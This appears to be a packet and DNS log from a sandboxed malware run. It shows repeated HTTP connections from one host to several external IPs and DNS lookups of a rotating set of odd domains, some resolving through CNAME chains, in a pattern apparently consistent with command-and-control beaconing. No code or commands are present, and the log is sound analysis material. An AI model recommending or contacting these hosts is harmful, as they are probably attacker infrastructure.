Oct 10, 2024 14:14:22.240586042 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.240598917 CEST	80	50024	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:22.240607977 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:22.240644932 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:23.088335991 CEST	50024	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.108336926 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.113220930 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.113377094 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.130304098 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.135268927 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.135282993 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.135322094 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.135333061 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.135360003 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.135391951 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.135420084 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.135442019 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.135473967 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.820887089 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.820930004 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.820966959 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.821000099 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.821001053 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.821055889 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.821085930 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.821089983 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.821121931 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.821151018 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.821156025 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.821183920 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.821207047 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.821221113 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.821363926 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.826306105 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.826339960 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.826373100 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.826405048 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.826422930 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.826457024 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.909430981 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.909456968 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.909471989 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.909542084 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.909563065 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.909578085 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.909591913 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.909615040 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.909801006 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.909949064 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.909962893 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.909976959 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.910080910 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.910316944 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.910331964 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.910346031 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.910370111 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.910440922 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.910713911 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.910728931 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.910742044 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.910765886 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.910779953 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.910789967 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.910794973 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.910816908 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.910880089 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:24.911715031 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.911727905 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.911742926 CEST	80	50025	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:24.911796093 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:25.634964943 CEST	50025	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:26.654951096 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:26.766789913 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:26.771435976 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:26.776266098 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:26.781076908 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.412941933 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.412980080 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.413009882 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.413213968 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.413381100 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.413408995 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.413542032 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.413657904 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.413777113 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.413779974 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.413805962 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.413836956 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.413871050 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.413913012 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.414057016 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.418214083 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.418373108 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.418452024 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.418551922 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.418585062 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.418724060 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.419122934 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.499813080 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.499850035 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.499885082 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.499917030 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.499949932 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.500010014 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.500108004 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.500251055 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.500278950 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.500328064 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.500376940 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.500410080 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.500416040 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.500442982 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.500473976 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.500941992 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.500974894 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.501007080 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.501013041 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.501045942 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.501298904 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.501349926 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.501379967 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.501425982 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.501537085 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.502557993 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.502588987 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.503299952 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.504900932 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.504951954 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.505002022 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.505038023 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.505055904 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.505069971 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:27.505140066 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.507477999 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.511425972 CEST	50026	80	192.168.2.4	203.161.46.201
Oct 10, 2024 14:14:27.516294956 CEST	80	50026	203.161.46.201	192.168.2.4
Oct 10, 2024 14:14:32.559509993 CEST	50027	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:32.564526081 CEST	80	50027	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:32.564651966 CEST	50027	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:32.575319052 CEST	50027	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:32.580315113 CEST	80	50027	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:33.177476883 CEST	80	50027	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:33.177541018 CEST	80	50027	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:33.177572012 CEST	80	50027	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:33.177934885 CEST	50027	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:34.087923050 CEST	50027	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:35.108705044 CEST	50028	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:35.113555908 CEST	80	50028	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:35.113755941 CEST	50028	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:35.127835035 CEST	50028	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:35.132688046 CEST	80	50028	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:35.716443062 CEST	80	50028	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:35.716483116 CEST	80	50028	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:35.716494083 CEST	80	50028	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:35.716535091 CEST	50028	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:36.636740923 CEST	50028	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:37.654107094 CEST	50029	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:37.658961058 CEST	80	50029	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:37.659152031 CEST	50029	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:37.672550917 CEST	50029	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:37.677417040 CEST	80	50029	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:37.677428961 CEST	80	50029	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:37.677443981 CEST	80	50029	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:37.677453041 CEST	80	50029	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:37.677463055 CEST	80	50029	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:37.677478075 CEST	80	50029	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:37.677516937 CEST	80	50029	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:37.677697897 CEST	80	50029	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:37.677706957 CEST	80	50029	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:38.262106895 CEST	80	50029	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:38.262125969 CEST	80	50029	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:38.262150049 CEST	80	50029	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:38.262214899 CEST	50029	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:38.262216091 CEST	50029	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:39.183088064 CEST	50029	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:40.201374054 CEST	50030	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:40.206301928 CEST	80	50030	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:40.206379890 CEST	50030	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:40.219162941 CEST	50030	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:40.224064112 CEST	80	50030	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:40.818506002 CEST	80	50030	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:40.818551064 CEST	80	50030	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:40.818566084 CEST	80	50030	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:40.818593979 CEST	80	50030	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:40.818748951 CEST	50030	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:40.818748951 CEST	50030	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:40.821554899 CEST	50030	80	192.168.2.4	161.97.168.245
Oct 10, 2024 14:14:40.826325893 CEST	80	50030	161.97.168.245	192.168.2.4
Oct 10, 2024 14:14:46.624515057 CEST	50031	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:46.629403114 CEST	80	50031	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:46.630975962 CEST	50031	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:46.638449907 CEST	50031	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:46.643338919 CEST	80	50031	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:47.611107111 CEST	80	50031	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:47.611133099 CEST	80	50031	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:47.611143112 CEST	80	50031	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:47.611176014 CEST	50031	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:47.611207962 CEST	50031	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:47.934367895 CEST	80	50031	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:47.934432983 CEST	50031	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:48.150062084 CEST	50031	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:49.171269894 CEST	50032	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:49.176239967 CEST	80	50032	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:49.178812981 CEST	50032	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:49.190459013 CEST	50032	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:49.195355892 CEST	80	50032	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:50.083714962 CEST	80	50032	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:50.084094048 CEST	80	50032	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:50.084187031 CEST	50032	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:50.697176933 CEST	50032	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:51.726152897 CEST	50033	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:51.731249094 CEST	80	50033	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:51.731332064 CEST	50033	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:51.747872114 CEST	50033	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:51.752809048 CEST	80	50033	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:51.752840996 CEST	80	50033	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:51.752855062 CEST	80	50033	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:51.752913952 CEST	80	50033	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:51.752962112 CEST	80	50033	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:51.752973080 CEST	80	50033	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:51.752999067 CEST	80	50033	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:51.753010988 CEST	80	50033	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:51.753021955 CEST	80	50033	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:52.649996042 CEST	80	50033	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:52.651103973 CEST	50033	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:53.262420893 CEST	50033	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:53.268460035 CEST	80	50033	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:54.291834116 CEST	50034	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:55.257213116 CEST	80	50034	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:55.260309935 CEST	50034	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:55.268307924 CEST	50034	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:55.273226023 CEST	80	50034	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:56.175002098 CEST	80	50034	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:56.175055981 CEST	80	50034	103.42.108.46	192.168.2.4
Oct 10, 2024 14:14:56.175137043 CEST	50034	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:56.177707911 CEST	50034	80	192.168.2.4	103.42.108.46
Oct 10, 2024 14:14:56.182552099 CEST	80	50034	103.42.108.46	192.168.2.4
Oct 10, 2024 14:15:09.552295923 CEST	50035	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:09.557250023 CEST	80	50035	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:09.566018105 CEST	50035	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:09.572360992 CEST	50035	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:09.577238083 CEST	80	50035	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:11.074635029 CEST	50035	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:11.081331968 CEST	80	50035	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:11.081624031 CEST	50035	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:12.128833055 CEST	50036	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:12.134140968 CEST	80	50036	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:12.134213924 CEST	50036	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:12.200325012 CEST	50036	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:12.205173016 CEST	80	50036	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:13.712023973 CEST	50036	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:13.717128992 CEST	80	50036	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:13.717191935 CEST	50036	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:14.730678082 CEST	50037	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:14.735665083 CEST	80	50037	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:14.735935926 CEST	50037	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:14.747878075 CEST	50037	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:14.752839088 CEST	80	50037	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:14.752871990 CEST	80	50037	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:14.752922058 CEST	80	50037	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:14.752948999 CEST	80	50037	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:14.752975941 CEST	80	50037	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:14.753011942 CEST	80	50037	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:14.753048897 CEST	80	50037	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:14.753076077 CEST	80	50037	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:14.753107071 CEST	80	50037	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:16.258992910 CEST	50037	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:16.264266968 CEST	80	50037	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:16.264333010 CEST	50037	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:17.279354095 CEST	50038	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:17.284264088 CEST	80	50038	85.159.66.93	192.168.2.4
Oct 10, 2024 14:15:17.286562920 CEST	50038	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:17.294003963 CEST	50038	80	192.168.2.4	85.159.66.93
Oct 10, 2024 14:15:17.298850060 CEST	80	50038	85.159.66.93	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 10, 2024 14:12:33.630498886 CEST	50220	53	192.168.2.4	1.1.1.1
Oct 10, 2024 14:12:33.979867935 CEST	53	50220	1.1.1.1	192.168.2.4
Oct 10, 2024 14:12:49.737212896 CEST	58287	53	192.168.2.4	1.1.1.1
Oct 10, 2024 14:12:49.809698105 CEST	53	58287	1.1.1.1	192.168.2.4
Oct 10, 2024 14:13:03.311609983 CEST	54333	53	192.168.2.4	1.1.1.1
Oct 10, 2024 14:13:03.709717035 CEST	53	54333	1.1.1.1	192.168.2.4
Oct 10, 2024 14:13:37.750171900 CEST	57016	53	192.168.2.4	1.1.1.1
Oct 10, 2024 14:13:37.892887115 CEST	53	57016	1.1.1.1	192.168.2.4
Oct 10, 2024 14:13:51.313740015 CEST	50058	53	192.168.2.4	1.1.1.1
Oct 10, 2024 14:13:51.683814049 CEST	53	50058	1.1.1.1	192.168.2.4
Oct 10, 2024 14:14:04.952414036 CEST	64873	53	192.168.2.4	1.1.1.1
Oct 10, 2024 14:14:04.969868898 CEST	53	64873	1.1.1.1	192.168.2.4
Oct 10, 2024 14:14:18.312082052 CEST	55677	53	192.168.2.4	1.1.1.1
Oct 10, 2024 14:14:19.015136957 CEST	53	55677	1.1.1.1	192.168.2.4
Oct 10, 2024 14:14:32.529186010 CEST	51209	53	192.168.2.4	1.1.1.1
Oct 10, 2024 14:14:32.556868076 CEST	53	51209	1.1.1.1	192.168.2.4
Oct 10, 2024 14:14:45.826906919 CEST	49931	53	192.168.2.4	1.1.1.1
Oct 10, 2024 14:14:46.620403051 CEST	53	49931	1.1.1.1	192.168.2.4
Oct 10, 2024 14:15:01.184103012 CEST	56728	53	192.168.2.4	1.1.1.1
Oct 10, 2024 14:15:01.195056915 CEST	53	56728	1.1.1.1	192.168.2.4
Oct 10, 2024 14:15:09.375931978 CEST	59392	53	192.168.2.4	1.1.1.1
Oct 10, 2024 14:15:09.546943903 CEST	53	59392	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 10, 2024 14:12:33.630498886 CEST	192.168.2.4	1.1.1.1	0x51b5	Standard query (0)	www.sendly.digital	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:12:49.737212896 CEST	192.168.2.4	1.1.1.1	0x6947	Standard query (0)	www.admaioraluxury.com	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:13:03.311609983 CEST	192.168.2.4	1.1.1.1	0xc301	Standard query (0)	www.tyc01054.top	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:13:37.750171900 CEST	192.168.2.4	1.1.1.1	0xd742	Standard query (0)	www.le-pier.online	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:13:51.313740015 CEST	192.168.2.4	1.1.1.1	0xb900	Standard query (0)	www.37wx.baby	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:14:04.952414036 CEST	192.168.2.4	1.1.1.1	0xbc4	Standard query (0)	www.avantfize.shop	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:14:18.312082052 CEST	192.168.2.4	1.1.1.1	0x70cc	Standard query (0)	www.zippio.top	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:14:32.529186010 CEST	192.168.2.4	1.1.1.1	0x3ae2	Standard query (0)	www.alanshortz.buzz	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:14:45.826906919 CEST	192.168.2.4	1.1.1.1	0x8f8a	Standard query (0)	www.mtmoriacolives.store	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:15:01.184103012 CEST	192.168.2.4	1.1.1.1	0xddc7	Standard query (0)	www.trytalnts.online	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:15:09.375931978 CEST	192.168.2.4	1.1.1.1	0x1dab	Standard query (0)	www.gloryastore.site	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 10, 2024 14:12:33.979867935 CEST	1.1.1.1	192.168.2.4	0x51b5	No error (0)	www.sendly.digital		194.58.112.174	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:12:49.809698105 CEST	1.1.1.1	192.168.2.4	0x6947	No error (0)	www.admaioraluxury.com	admaioraluxury.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 10, 2024 14:12:49.809698105 CEST	1.1.1.1	192.168.2.4	0x6947	No error (0)	admaioraluxury.com		62.149.128.40	A (IP address)	IN (0x0001)	false
Oct 10, 2024 14:13:03.709717035 CEST	1.1.1.1	192.168.2.4	0xc301	No error (0)	www.tyc01054.top	yqcpwebzx.xaomenlebo004.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 10, 2024 14:13:03.709717035 CEST	1.1.1.1	192.168.2.4	0xc301	No error (0)	yqcpwebzx.xaomenlebo004.com	yqcpbackzx.javalebogame004.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 10, 2024 14:13:03.709717035 CEST	1.1.1.1	192.168.2.4	0xc301	No error (0)	yqcpbackzx.javalebogame004.com		185.99.134.9	A (IP address)	IN (0x0001)	false
